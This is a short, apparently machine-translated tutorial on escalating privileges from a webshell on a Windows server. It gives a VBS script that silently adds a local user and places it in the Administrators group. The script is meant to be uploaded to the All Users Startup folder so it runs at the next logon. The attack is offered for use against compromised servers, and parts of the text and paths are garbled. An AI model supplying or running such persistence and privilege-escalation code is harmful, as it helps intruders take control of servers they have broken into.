Permission escalation for webshell write startup project

When we get the webshell of a website, we want to further obtain the server permissions of the website. we can view the readable and writable directory of the system disk on the current server. If the C on the server is: \ Documents and Settings \ All Users \ Start Menu \ Program \ Start 'directory has a readable and writable directory, so we can upload a vbs or bat script for elevation of permission. Here I will explain in detail how to use the vbs script to escalate permissions and add users. 1. We will first write a script code for adding a user password to vbs. You can modify the user password as follows.

Set wshshell = createobject ("wscript. shell ") a = wshshell. run ("cmd.exe/c net user username/add", 0) B = wshshell. run ("cmd.exe/c net localgroup Administrators username/add", 0)

 

After changing the account password, copy the above Code and save it as an arbitrary file name in. vbs. 2. save and upload the vbs script to C: \ Documents ents and Settings \ All Users \ "start" Menu \ Program \ start, and then we end the process with Elevation of Privilege, the account password can be automatically added when the target server is logged on again. PS: A patient friend can use this method to initiate a privilege escalation attempt. Of course, our goal is to allow the Administrator to log on to the server. As for how to do it, you can do it yourself.